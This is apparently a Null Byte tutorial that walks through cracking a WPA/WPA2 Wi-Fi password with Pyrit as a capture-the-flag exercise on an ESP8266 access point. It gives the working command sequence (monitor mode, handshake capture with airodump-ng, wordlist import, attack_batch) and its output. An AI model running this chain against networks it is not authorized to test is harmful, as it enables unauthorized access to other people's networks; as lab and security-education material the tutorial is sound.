How To: Crack WPA & WPA2 Wi-Fi Passwords with Pyrit

Crack WPA & WPA2 Wi-Fi Passwords with Pyrit

Pyrit is one of the most powerful WPA/WPA2 cracking tools in a hacker's arsenal, with the ability to benchmark a computer's CPU speeds, analyze capture files for crackable handshakes, and even tap into GPU password-cracking power. To demonstrate how quickly it can hack a WPA/WPA2 password, we'll use it to play a Wi-Fi hacking CTF game anyone can practice for less than $10.

Wi-Fi is incredibly convenient but comes with inherent security problems that make using it riskier than a wired alternative. That's because anyone can join a WPA-encrypted Wi-Fi network provided they know the password, allowing an attacker direct access to other devices on the network and network traffic in general. Choosing a Wi-Fi password that is difficult to guess is very important, because, with a good password list and a program like Pyrit, even huge password lists can be searched through in a matter of minutes.

Password-Cracking with OpenCL & CUDA

While we won't be using GPU cracking today, Pyrit is capable of using a compatible GPU to crack passwords even faster. It's dependent on your computer's hardware, and thus the setup process will depend on the type of GPU you have and whether you choose to use OpenCL or CUDA. Once GPU acceleration is enabled, Pyrit is one of the fastest tools available for WPA password-cracking out there.

You may get lucky in that the GPU of your computer already is compatible with Pyrit, but getting the GPU acceleration working is an unfun process that I'll leave to those of you brave enough. You can always attempt it by following Pyrit's guide on GitHub for instructions, but I wasn't able to get it working correctly on either laptop I tried it on, at the time of this writing.

Cracking the Password in Our CTF Game

Pyrit has many tools that are useful for hackers and pentesters besides just cracking passwords, and today, we'll use a few of those tools to help us play a capture-the-flag Wi-Fi hacking game. One helpful tool is the strip command, which strips down long capture files to only include relevant packets. And then there's the verify option that lets Pyrit confirm results via recomputation.

Pyrit also has several features to import multiple password lists into a large database. To prevent duplicates, the import_unique_passwords command can also strip out passwords that appear multiple times in the same file we're trying to import. After we import passwords to the database, we can start cracking them with the attack_batch option.

In Kali Linux, we can see the description of the tool by typing man pyrit in a terminal window.

NAME
       pyrit - A GPGPU-driven WPA/WPA2-PSK key cracker

SYNOPSIS
       pyrit [options] command

DESCRIPTION
       Pyrit  exploits  the  computational power of many-core- and GPGPU-plat‐
       forms  to  create  massive  databases,  pre-computing   part   of   the
       WPA/WPA2-PSK  authentication  phase  in  a space-time tradeoff. It is a
       powerful attack against one of the world's  most  used  security-proto‐
       cols.

...

Without adding passwords to the Pyrit database directly, the most basic attack we can run with Pyrit is the attack_passthrough option, summarized by manual description.

attack_passthrough
                     Attack an EAPOL-handshake  found  in  the  packet-capture
                     file(s)  given  by the option -r using the passwords read
                     from the file given by the option -i.  The options -b and
                     -e  can be used to specify the Access-Point to attack; it
                     is picked automatically if both options are omitted.  The
                     password  is  written to the filename given by the option
                     -o if specified. For example:

                          pyrit -r test.pcap -b 00:de:ad:be:ef:00 \
                              -i words.txt attack_passthrough

                     Pyrit attacks all EAPOL-handshakes at the  same  time  if
                     the option --all-handshakes is supplied.

While we'll step this up by loading some passwords into the database first, the most basic method of password cracking with Pyrit is incredibly simple to use.

The CTF Wi-Fi Hacking Scenario

To follow along, you'll need at a minimum a Kali-compatible wireless network adapter, a Wi-Fi network you know the password to, a device like a smartphone to join the network to create handshakes, and a computer running Kali Linux.

If you want to try out our scenario more easily, you can use an ultra-cheap ESP8266 microcontroller programmed in Arduino to both create a Wi-Fi network to hack and generate handshakes at the same time. For anyone wanting to practice with an MCU, my friends and I wrote a Wi-Fi hacking CTF game called the ChickenManGame, which is the world's most famous (and only) Wi-Fi hacking CTF game based on the ESP8266.

Image by Kody/Null Byte

To play the game, I recommend using either a NodeMCU or D1 Mini microcontroller, both of which are based on the ESP8266 and cost between $2 and $5 each board. Load the ChickenManGame sketch in Arduino, install the needed libraries, and push the code to the ESP8266 following the instructions on the GitHub repository. After you've pushed the code to each microcontroller, plug in a red, green, and blue LED to each as shown in the instructions on GitHub.

Image by Kody/Null Byte

Finally, plug each device into a Micro-USB power source, then connect a jumper wire from pin D7 to ground on only one of them. The ESP8266 without pin D7 connected to ground will create a Wi-Fi network named "Chicken Easy" with a number at the end. The second device with pin D7 connected to ground will join the Wi-Fi network that the first one created, generating WPA handshakes for you to capture and crack easily.

In our game today, we'll be trying to connect to an encrypted Wi-Fi access point with a WPA/WPA2 password we don't know. We'll do this in a few steps, using airodump-ng to grab the handshake, and Pyrit to crack the password.

Step 1: Install Pyrit

To install Pyrit on a Kali system, type apt install pyrit in a terminal window. Pyrit is installed by default on full Kali installs, but for the lite version, you may need to install it manually.

~$ apt install pyrit

Reading package lists... Done
Building dependency tree
Reading state information... Done
pyrit is already the newest version (0.5.1+git20180801-1).
pyrit set to manually installed.
The following package was automatically installed and is no longer required:
  libgit2-27
Use 'apt autoremove' to remove it.
0 upgraded, 0 newly installed, 0 to remove and 1795 not upgraded.

Once it's finished installing, type pyrit -h to print the help menu and confirm it's installed on our system.

~$ pyrit -h

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Usage: pyrit [options] command

Recognized options:
  -b               : Filters AccessPoint by BSSID
  -e               : Filters AccessPoint by ESSID
  -h               : Print help for a certain command
  -i               : Filename for input ('-' is stdin)
  -o               : Filename for output ('-' is stdout)
  -r               : Packet capture source in pcap-format
  -u               : URL of the storage-system to use
  --all-handshakes : Use all handshakes instead of the best one
  --aes            : Use AES

Recognized commands:
  analyze                 : Analyze a packet-capture file
  attack_batch            : Attack a handshake with PMKs/passwords from the db
  attack_cowpatty         : Attack a handshake with PMKs from a cowpatty-file
  attack_db               : Attack a handshake with PMKs from the db
  attack_passthrough      : Attack a handshake with passwords from a file
  batch                   : Batchprocess the database
  benchmark               : Determine performance of available cores
  benchmark_long          : Longer and more accurate version of benchmark (5 minutes)
  check_db                : Check the database for errors
  create_essid            : Create a new ESSID
  delete_essid            : Delete a ESSID from the database
  eval                    : Count the available passwords and matching results
  export_cowpatty         : Export results to a new cowpatty file
  export_hashdb           : Export results to an airolib database
  export_passwords        : Export passwords to a file
  help                    : Print general help
  import_passwords        : Import passwords from a file-like source
  import_unique_passwords : Import unique passwords from a file-like source
  list_cores              : List available cores
  list_essids             : List all ESSIDs but don't count matching results
  passthrough             : Compute PMKs and write results to a file
  relay                   : Relay a storage-url via RPC
  selftest                : Test hardware to ensure it computes correct results
  serve                   : Serve local hardware to other Pyrit clients
  strip                   : Strip packet-capture files to the relevant packets
  stripLive               : Capture relevant packets from a live capture-source
  verify                  : Verify 10% of the results by recomputation

What We'll End Up With

For our attack, we'll be using the attack_batch option, and we'll need a couple of pieces of information for the command to work.

First, we need to include a capture file that our WPA/WPA2 handshake is saved in. We'll add it by adding the -r flag, with the location of the file containing our handshake directly after. Next, we'll need to add a list of passwords to Pyrit, which we can do with the import_unique_passwords command and the -i flag to indicate the password list we want to add. We'll be using a WPA password list from the SecLists GitHub repository. Finally, we'll be using the -o flag to save the password to a file.

Our final command should look something like this when we're ready:

~$ pyrit -r capture.pcap -o savedpass attack_batch

Before we can execute the attack, however, we'll need to grab the handshake and the password list, so let's grab those first.

Step 2: Download a Password List & Benchmark System

For our password list, we're going to download the excellent WPA cracking wordlist hosted at the SecList GitHub repository. To download it to our Desktop, type the following commands into a terminal window.

~$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt

--2019-12-20 13:19:39--  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45276 (44K) [text/plain]
Saving to: ‘probable-v2-wpa-top4800.txt’

probable-v2-wpa-top 100%[===================>]  44.21K  --.-KB/s    in 0.07s

2019-12-20 13:19:39 (627 KB/s) - ‘probable-v2-wpa-top4800.txt’ saved [45276/45276]

When it's complete, we should have a password list of 4,800 of the worst passwords out there to start with, downloaded to our desktop. To know how quickly we'll be able to crack through them, we'll need to benchmark our system with Pyrit. To do so, type pyrit benchmark into a terminal window and wait while it completes.

~$ pyrit benchmark

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Running benchmark (1157.3 PMKs/s)... |

Computed 1157.32 PMKs/s total.
#1: 'CPU-Core (SSE2/AES)': 298.2 PMKs/s (RTT 2.9)
#2: 'CPU-Core (SSE2/AES)': 312.0 PMKs/s (RTT 3.0)
#3: 'CPU-Core (SSE2/AES)': 312.6 PMKs/s (RTT 2.7)
#4: 'CPU-Core (SSE2/AES)': 310.5 PMKs/s (RTT 3.0)

Here, we can see that my rather old Lenovo can try about 1,157.3 PMKs per second, meaning it would take about 4.1 seconds to try every password in the file. Compare that to a new Macbook Pro with 4,226 PMKs per second, and you see how CPU power matters when it comes to cracking.

Let's add our passwords to the database with the import_passwords command, adding -i and the path to the password list we want to add. Type the following command into your terminal window, modifying the password list to match where you saved yours.

~$ pyrit -i '/root/Desktop/probable-v2-wpa-top4800.txt' import_passwords

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
4800 lines read. Flushing buffers....
All done.

Now we have 4,800 passwords saved in Pyrit's database, and we can use the attack_batch option.

Step 3: Capture a WPA/WPA2 Handshake

To capture a handshake, we'll need to listen in on one device connecting to our target Wi-Fi network. First, let's put our card into wireless monitor mode so that we can listen in on handshake files.

First, open a terminal window and type ifconfig to locate the name of your wireless network adapter. If you're using an external USB adapter that's compatible with Kali, it will probably be named something like wlan1.

~$ ifconfig

eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 50:7b:9d:7a:c8:8a  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 856  bytes 71488 (69.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 856  bytes 71488 (69.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.37  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 2606:6000:66d0:a000:8991:f76f:faec:2713  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::903f:322c:1ad9:a365  prefixlen 64  scopeid 0x20<link>
        ether 30:52:cb:6b:76:5f  txqueuelen 1000  (Ethernet)
        RX packets 17933  bytes 22147581 (21.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10045  bytes 1333343 (1.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:c0:ca:95:6e:74  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Next, we'll put our card into wireless monitor mode with the command airmon-ng start wlan1. Airmon-ng is installed on Kali by default. When we run ifconfig again, our card should now be called "wlan1mon." Now, let's grab a handshake.

First, we'll run a scan to find what channel our target network is on. To do so, run airodump-ng wlan1mon. Again, you should already have airodump-ng.

~$ airodump-ng wlan1mon

CH 10 ][ Elapsed: 0 s ][ 2019-04-29 12:32

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 18:FE:34:00:00:02  -40        4        0    0   3  48   WPA2 CCMP   PSK  Chicken_Easy_02

We can see our target network is on channel 3. Now that we know this, we can capture a handshake with the command airodump-ng wlan1mon -c 3 -w capture.

~$ airodump-ng wlan1mon -c 3 -w capture

When you've captured a handshake, you can confirm it with Pyrit. After copying the location of your capture file, run the command pyrit -r pathtocapturefile analyze to confirm you have a valid capture.

~$ pyrit -r '/root/Desktop/capture-01.cap' analyze

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Parsing file '/root/Desktop/marko-01.cap' (1/1)...
Parsed 122 packets (122 802.11-packets), got 8 AP(s)

#1: AccessPoint 84:61:a0:61:39:90 ('ATT9X3s2e4'):
#2: AccessPoint ce:50:e3:08:11:d4 ('Chicken_Easy_01'):
  #1: Station 84:0d:8e:8c:b0:1c, 4 handshake(s):
    #1: HMAC_SHA1_AES, good, spread 1
    #2: HMAC_SHA1_AES, good, spread 1
    #3: HMAC_SHA1_AES, good, spread 87
    #4: HMAC_SHA1_AES, good, spread 87
#3: AccessPoint 6e:4d:73:96:78:a7 ('Edgardo'):
  #1: Station cc:29:f5:57:fc:98
#4: AccessPoint c4:01:7c:57:69:a8 ('LILA-Guest'):
#5: AccessPoint c4:01:7c:97:69:a8 ('LILA-STAFF'):
#6: AccessPoint 6c:b0:ce:ad:1e:53 ('MyCharterWiFi53-2G'):
#7: AccessPoint b0:98:2b:4a:b4:d4 ('MySpectrumWiFice-2G'):
#8: AccessPoint c4:01:7c:17:69:a8 ('PS-WL-MO'):

Here, we can see that we have good handshakes, meaning we can proceed with cracking.

Step 4: Run Pyrit on the Handshake

Now that we've captured the handshake and added the passwords to the database, we can run our attack_batch command we created before. Run the command pyrit -r pathtocapturefile -o savedpass attack_batch to try cracking handshakes we captured.

~$ pyrit -r '/root/Desktop/capture-01.cap' -o savedpass attack_batch

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Parsing file '/root/Desktop/capture-01.cap' (1/1)...
Parsed 122 packets (122 802.11-packets), got 8 AP(s)

Picked AccessPoint ce:50:e3:08:11:d4 ('Chicken_Easy_01') automatically.
Tried 447 PMKs so far; 250 PMKs per second. password

The password is '123456789'.

Success! If you're playing our Wi-Fi hacking CTF game, you can log into the Wi-Fi access point, navigate to 192.168.4.1, and click on your team's color to claim the game piece for your team.

If you're not playing our game, then you just cracked the password to a WPA/WPA2 network, provided the password was on the list. If it wasn't, you might need a more extensive password list, even to try brute-forcing it.

Pyrit Makes It Easy to Brute-Force Passwords

While we didn't go over everything Pyrit can do today, there is a lot we didn't cover. Of course, while Pyrit is one of the most potent brute-force attacks out there, an extremely strong password will still defeat the attack. Pyrit is capable of both dictionary and true brute-forcing attacks depending on what your system can handle, so make sure to pick strong passwords if you don't want to be vulnerable to easy cracking with tools like Pyrit.

I hope you enjoyed this guide to brute-forcing passwords using Pyrit! If you have any questions about this tutorial on using your CPU and GPU to crack passwords using Pyrit, please ask below, and if you have a comment or idea for a future episode, feel free to reach me on Twitter @KodyKinzie.

Cover photo by Kody/Null Byte

Never Miss a Hacking or Security Guide

Get new Null Byte guides every week.

3 Comments

Well, that works only if the target was dumb enough to change the default password.... Regardless of which tool you use. I might me wrong, but it seems nearly impossible (in less than 24h, unless you have a superpowerful cracking station) to crack a standard wpa2 password (" 764E8069257C69E59C3A67F143")

Depends on how the default password is derived

how use gpu in pyrit password cracking?

Share Your Thoughts

  • Hot
  • Latest